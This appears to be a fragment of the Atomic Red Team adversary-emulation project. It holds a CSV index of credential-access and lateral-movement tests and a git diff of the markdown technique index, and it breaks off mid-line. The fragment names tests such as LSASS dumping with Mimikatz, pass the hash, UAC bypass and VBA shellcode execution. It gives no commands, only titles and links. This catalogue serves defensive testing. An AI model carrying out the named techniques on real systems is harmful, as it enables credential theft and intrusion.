ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt -credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell -credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt -credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual -credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt -credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt -credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt -credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt -credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt -credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt -credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell -credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt -credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt -credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt -credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell -credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt -credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell -credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt -credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell -credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt -credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt -credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell -credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt -credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt -credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt -credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt -credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 51fb922f..5e5dcd3e 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -24,7 +24,7 @@ - T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md) +- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] - Atomic Test #3: Bypass UAC using Fodhelper [windows] @@ -107,12 +107,15 @@ - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - Atomic Test #1: Append malicious start-process cmdlet [windows] +- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md) - Atomic Test #1: Process Hollowing using PowerShell [windows] + - Atomic Test #2: RunPE via VBA [windows] - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] + - Atomic Test #2: Shellcode execution via VBA [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] @@ -132,6 +135,7 @@ - Atomic Test #2: Scheduled task Local [windows] - Atomic Test #3: Scheduled task Remote [windows] - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.002 Screensaver](../../T1546.002/T1546.002.md) - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] @@ -156,6 +160,7 @@ - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] +- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -189,7 +194,7 @@ - Atomic Test #2: Domain Account and Group Manipulate [windows] - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] @@ -303,6 +308,8 @@ - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - Atomic Test #1: Append malicious start-process cmdlet [windows] - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) @@ -324,6 +331,7 @@ - Atomic Test #2: Scheduled task Local [windows] - Atomic Test #3: Scheduled task Remote [windows] - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.002 Screensaver](../../T1546.002/T1546.002.md) - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] @@ -342,6 +350,8 @@ - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] +- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1505.002 Transport Agent](../../T1505.002/T1505.002.md) @@ -366,6 +376,8 @@ - [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] - Atomic Test #2: Access /etc/passwd (Local) [linux] +- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -379,7 +391,8 @@ - Atomic Test #2: Extract passwords with grep [macos, linux] - Atomic Test #3: Extracting passwords with findstr [windows] - Atomic Test #4: Access unattend.xml [windows] -- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1555 Credentials from Password Stores](../../T1555/T1555.md) + - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #1: Run Chrome-password Collector [windows] - Atomic Test #2: Search macOS Safari Cookies [macos] @@ -425,6 +438,7 @@ - Atomic Test #4: Create Volume Shadow Copy with WMI [windows] - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows] - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows] +- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - Atomic Test #2: Packet Capture macOS [macos] @@ -464,6 +478,74 @@ - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# collection +- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1560 Archive Collected Data](../../T1560/T1560.md) + - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows] +- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md) + - Atomic Test #1: Compress Data for Exfiltration With Rar [windows] + - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows] + - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows] + - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows] + - Atomic Test #5: Data Compressed - nix - zip [linux, macos] + - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] + - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] + - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux] +- [T1123 Audio Capture](../../T1123/T1123.md) + - Atomic Test #1: using device audio capture commandlet [windows] +- [T1119 Automated Collection](../../T1119/T1119.md) + - Atomic Test #1: Automated Collection Command Prompt [windows] + - Atomic Test #2: Automated Collection PowerShell [windows] + - Atomic Test #3: Recon information for export with PowerShell [windows] + - Atomic Test #4: Recon information for export with Command Prompt [windows] +- [T1115 Clipboard Data](../../T1115/T1115.md) + - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows] + - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows] + - Atomic Test #3: Execute commands from clipboard [macos] + - Atomic Test #4: Collect Clipboard Data via VBA [windows] +- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) + - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] +- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) + - Atomic Test #1: AppleScript - Prompt User for Password [macos] + - Atomic Test #2: PowerShell - Prompt User for Password [windows] +- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) + - Atomic Test #1: Input Capture [windows] +- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) + - Atomic Test #1: Stage data from Discovery.bat [windows] + - Atomic Test #2: Stage data from Discovery.sh [linux, macos] + - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows] +- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md) + - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows] +- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1113 Screen Capture](../../T1113/T1113.md) + - Atomic Test #1: Screencapture [macos] + - Atomic Test #2: Screencapture (silent) [macos] + - Atomic Test #3: X Windows Capture [linux] + - Atomic Test #4: Capture Linux Desktop using Import Tool [linux] + - Atomic Test #5: Windows Screencapture [windows] +- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -478,7 +560,7 @@ - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md) +- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] - Atomic Test #3: Bypass UAC using Fodhelper [windows] @@ -543,6 +625,8 @@ - Atomic Test #2: Certutil Rename and Decode [windows] - [T1006 Direct Volume Access](../../T1006/T1006.md) - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows] +- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md) - Atomic Test #1: Disable Windows IIS HTTP Logging [windows] - Atomic Test #2: Kill Event Log Service Threads [windows] @@ -581,6 +665,7 @@ - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -604,9 +689,6 @@ - [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md) - Atomic Test #1: Gatekeeper Bypass [macos] - T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md) - - Atomic Test #1: Disable history collection [linux, macos] - - Atomic Test #2: Mac HISTCONTROL [macos, linux] - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] @@ -623,6 +705,9 @@ - Atomic Test #1: Hidden Window [windows] - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md) + - Atomic Test #1: Disable history collection [linux, macos] + - Atomic Test #2: Mac HISTCONTROL [macos, linux] - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md) - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux] @@ -682,6 +767,7 @@ - Atomic Test #4: Add domain to Trusted sites Zone [windows] - Atomic Test #5: Javascript in registry [windows] - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows] +- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] @@ -701,6 +787,9 @@ - Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows] - Atomic Test #3: Create ADS command prompt [windows] - Atomic Test #4: Create ADS PowerShell [windows] +- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md) - Atomic Test #1: Add Network Share [windows] - Atomic Test #2: Remove Network Share [windows] @@ -725,6 +814,7 @@ - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows] - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) - Atomic Test #1: Install and Register Password Filter DLL [windows] +- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) @@ -737,11 +827,15 @@ - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md) - Atomic Test #1: Process Hollowing using PowerShell [windows] + - Atomic Test #2: RunPE via VBA [windows] - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] + - Atomic Test #2: Shellcode execution via VBA [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] +- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md) - Atomic Test #1: Regasm Uninstall Method Call Test [windows] @@ -794,6 +888,8 @@ - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] - Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows] - Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows] + - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows] + - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows] - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md) - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows] @@ -815,6 +911,7 @@ - Atomic Test #2: Detect Virtualization Environment (Windows) [windows] - Atomic Test #3: Detect Virtualization Environment (MacOS) [macos] - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -836,9 +933,12 @@ - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1218.012 Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) - Atomic Test #1: Take ownership using takeown utility [windows] @@ -918,6 +1018,7 @@ - Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows] - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.002 Domain Account](../../T1087.002/T1087.002.md) @@ -1058,6 +1159,83 @@ - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# resource-development +- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + +# reconnaissance +- T1595 Active Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.004 CDNs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1589.001 Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.002 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1589.003 Employee Names [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592.003 Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592.001 Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.004 Network Topology [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1598 